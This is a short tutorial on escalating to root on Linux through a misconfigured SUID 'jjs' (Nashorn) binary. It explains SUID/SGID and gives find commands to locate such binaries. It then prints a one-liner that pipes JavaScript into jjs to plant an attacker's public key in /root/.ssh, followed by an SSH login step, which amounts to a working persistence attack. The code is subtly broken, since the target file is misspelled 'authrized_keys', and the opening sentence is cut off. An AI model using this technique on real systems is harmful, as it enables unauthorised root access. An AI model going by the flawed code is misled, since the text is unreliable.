Description: JJS is an acronym for ‘java java script’. JJS is a command-line tool to invoke the ‘Nashorn’ engine. This is the recommended tool, created specifically for ‘Nashorn’. To evaluate a script file using Nashorn, pass the name of the script file to the
What is Nashorn engine ?
- Nashorn helps the developer to add scripting support to the application. The end-user can quickly modify the product without recompiling the whole Java application.
How is it possible?
It is possible to elevate privileges, if SUID or SGID permissions are enabled. Basically it’s a misconfigured permission , which leads to privilege escalation.
What is SUID ?
SUID (Set owner User ID up on execution) is a special type of file permissions given to a file. Normally in Linux/Unix when a program runs, it inherit’s access permissions from the logged in user. SUID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file owner rather that the user who runs it. In simple words users will get file owner’s permissions as well as owner UID and GID when executing a file/program/command.
What is SGID ?
SGID (Set Group ID up on execution) is a special type of file permissions given to a file/folder. Normally in Linux/Unix when a program runs, it inherits access permissions from the logged in user. SGID is defined as giving temporary permissions to a user to run a program/file with the permissions of the file group permissions to become member of that group to execute the file. In simple words users will get file Group’s permissions when executing a Folder/file/program/command.
SGID is similar to SUID. The difference between both is that SUID assumes owner of the file permissions and SGID assumes group’s permissions when executing a file instead of logged in user inherit permissions.
How to identify ?
Run automated script like LinEnum.sh, linpeas.sh etc. or ” $find / -perm +4000 “ or “$find / -perm +2000”
Time to exploit!!!
I found a very effective and great script written by “gtfobins”, link given below.
Basically we are elevating the privileges with “gtfobins” script and writing into ‘/root/.ssh’ folder.
echo 'var FileWriter = Java.type("java.io.FileWriter"); var fw=new FileWriter("/root/.ssh/authrized_keys"); fw.write("<public key>"); fw.close();' | jjs
copy paste above code and create “test.sh” file.
Execute “test.sh” in target machine.
Login with your private key.
- Syntax: ssh -i <private key> username@host-ip
- Example: ssh -i id_rsa email@example.com
We have successfully exploited the misconfigured ‘jjs’ tool.